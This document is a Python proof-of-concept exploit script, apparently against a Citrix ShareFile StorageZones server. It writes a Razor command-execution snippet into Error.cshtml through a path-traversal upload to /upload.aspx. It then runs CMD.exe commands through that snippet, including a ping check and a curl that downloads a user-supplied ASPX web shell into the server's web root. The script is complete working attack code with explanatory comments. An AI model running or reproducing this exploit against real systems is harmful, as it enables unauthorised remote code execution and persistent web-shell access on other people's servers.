import requests
import random
import string


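def parse_args(argv=None):
    """Parse the command line for this script.

    Args:
        argv: Optional list of argument strings. When ``None`` (the default)
            argparse reads ``sys.argv[1:]``, so existing ``parse_args()``
            callers keep working; passing a list makes the function testable.

    Returns:
        argparse.Namespace with ``url`` (required), ``proxy``, ``IP`` (the
        value of ``--ping``, kept under ``dest="IP"`` for the caller) and
        ``shell``; the three optional ones default to ``None``.
    """
    import argparse
    # prog is only used in the usage line; the file is named exploit.py.
    parser = argparse.ArgumentParser(prog="python3 exploit.py")
    parser.add_argument('-u', '--url', required=True, type=str,
                        help="Base URL (scheme and host) that requests are sent to")
    parser.add_argument('--proxy', required=False, type=str, default=None,
                        help="Proxy URL, support HTTP proxies (Example: http://127.0.0.1:8080)")
    parser.add_argument('--ping', required=False, type=str, default=None, dest="IP",
                        help="Ping to ip address")
    parser.add_argument('--shell', required=False, type=str, default=None,
                        help="Your aspx shell address (Example: http://127.0.0.1/shell.aspx)")
    return parser.parse_args(argv)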

def encode_multipart_formdata(files):
    """Serialise one file part as a ``multipart/form-data`` body.

    ``files`` is a dict with the keys ``name``, ``filename`` and
    ``content_file``. All three values are interpolated verbatim -- there is
    no quoting or escaping -- and the boundary is the fixed string
    ``boundary``.

    Returns:
        A ``(body, content_type)`` tuple, where ``content_type`` is the value
        to send in the ``Content-Type`` header.
    """
    boundary = "boundary"
    part = (
        f"--{boundary}\r\n"
        f"Content-Disposition: form-data; name=\"{files['name']}\"; "
        f"filename=\"{files['filename']}\"\r\n"
        "\r\n"
        f"{files['content_file']}\r\n"
    )
    closing = f"--{boundary}--\r\n"
    content_type = f"multipart/form-data; boundary={boundary}"
    return part + closing, content_type

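def check_connection(url, proxies):
    """Probe ``url`` with one GET to confirm it is reachable through ``proxies``.

    Any HTTP status counts as reachable; only a failure of the request itself
    (DNS, connect, proxy or the 10 s timeout) counts as unreachable.

    Returns:
        ``True`` when the request completed, ``False`` when it failed. The
        original returned ``None`` on success, so callers comparing the
        result with ``== False`` keep working.
    """
    print("[*] Checking connection...")
    try:
        requests.get(url, proxies=proxies, timeout=10)
    except requests.RequestException:
        # requests' base class for all transport/URL errors; anything else is a
        # programming error and should surface rather than be reported as "no connection".
        print("Connection failed, please check url/proxy again!")
        return False
    print("[*] Connection successfully!")
    return True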


def exploit(url, proxies):
    """Send the single multipart POST to ``<url>/upload.aspx`` that this PoC relies on.

    The body is a 4096-character random alphanumeric file part (its content is
    irrelevant). The ``uploadid`` query parameter carries a Razor (cshtml) code
    block followed by a ``/../../`` traversal ending in
    ``ConfigService\\Views\\Shared\\Error.cshtml``; ``check_ping`` and
    ``get_shell`` below then request ``/configservice/Home/Error`` with the
    query keys ``0`` and ``1`` that the snippet reads.

    Nothing is returned and the response is never inspected, so the caller
    cannot tell whether the request had any effect. Request errors are printed
    and otherwise swallowed.

    Detection note: the traversal sequence and the ``@using``/``@{`` markers
    travel in the query string of a POST to ``/upload.aspx`` and are visible in
    web-server, proxy and WAF logs.
    """
    # Random filler so the upload carries a body; the value itself is not used again.
    content_file = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(4096))
    files = {
        "name": "text4",
        "filename": "text5",
        "content_file": content_file
    }
    data, content_type = encode_multipart_formdata(files)
    headers = {"Content-Type": content_type}
    # Razor code block: reads query-string keys "0" and "1" and hands them to Process.Start.
    payload = "@using System.Diagnostics;@{int idx0= 0;string str_idx0 = idx0.ToString(); int idx1 = 1;string str_idx1 = idx1.ToString();string cmd = Request.QueryString[str_idx0];string arg = Request.QueryString[str_idx1];Process.Start(cmd,arg);}"
    # "\V", "\S" and "\E" are not recognised Python escapes, so the backslashes are kept
    # literally (Python 3.12+ emits a SyntaxWarning); a raw string would yield the same value.
    params = {
        "uploadid": payload+'/../../ConfigService\Views\Shared\Error.cshtml',
        "bp": "123",
        "accountid": "123"
    }
    target = url + "/upload.aspx"
    try:
        # No timeout: a non-responding host blocks here indefinitely.
        requests.post(target, data=data, params=params, headers=headers, proxies=proxies)
    except Exception as e:
        # Best-effort: the error is shown but the script carries on regardless.
        print(e)

def check_ping(url,ip, proxies):
    """GET ``/configservice/Home/Error`` with ``0=CMD.exe`` and ``1=/C ping -n 5 <ip>``.

    These are the two query keys the Razor snippet written by ``exploit`` reads.
    ``ip`` is interpolated unquoted into the URL; the spaces in the query are
    left for ``requests`` to percent-encode. The response is discarded and no
    timeout is set.
    """
    target = "%s/configservice/Home/Error?0=CMD.exe&1=/C ping -n 5 %s" %(url,ip)
    requests.get(target, proxies=proxies)

def get_shell(url,url_shell,proxies):
    """GET ``/configservice/Home/Error`` with ``0=CMD.exe`` and a ``curl <url_shell> -o ...`` argument.

    The ``-o`` target is ``C:\\inetpub\\wwwroot\\Citrix\\StorageCenter\\<name>.aspx``
    with ``name`` a fresh 6-character random alphanumeric string, which is then
    printed. As with ``check_ping`` the response is not inspected, so the printed
    location is not verified, and no timeout is set.
    """
    filename = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
    # "\i", "\w", "\C", "\S" and "\%" are not valid Python escapes: each backslash is kept
    # literally (SyntaxWarning on 3.12+) and "\%s" becomes a backslash followed by the
    # formatted filename. The double space before -o is part of the literal as written.
    target = "%s/configservice/Home/Error?0=CMD.exe&1=/C curl %s  -o \"C:\inetpub\wwwroot\Citrix\StorageCenter\%s.aspx\"" %(url,url_shell,filename)
    requests.get(target, proxies=proxies)
    print("Your shell is located at /%s.aspx" %filename)

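def main():
    """Command-line entry point.

    Parses the arguments, aborts if the connectivity probe fails, then runs the
    stages selected by the optional flags: ``exploit`` always, ``check_ping``
    when ``--ping`` was given and ``get_shell`` when ``--shell`` was given.
    """
    args = parse_args()
    url = args.url
    # requests treats a None proxy value as "no proxy", so this is valid without --proxy.
    proxies = {
        "http": args.proxy,
        "https": args.proxy,
    }
    # check_connection() returns False on failure; a successful probe may return
    # None, so test identity with False rather than truthiness.
    if check_connection(url, proxies) is False:
        return
    exploit(url, proxies)
    if args.IP is not None:
        check_ping(url, args.IP, proxies)
    if args.shell is not None:
        get_shell(url, args.shell, proxies)
    print("[*] Exploit Ended!")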

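# Guard the entry point so importing this module (e.g. to unit-test
# encode_multipart_formdata or parse_args) does not fire requests.
if __name__ == "__main__":
    main()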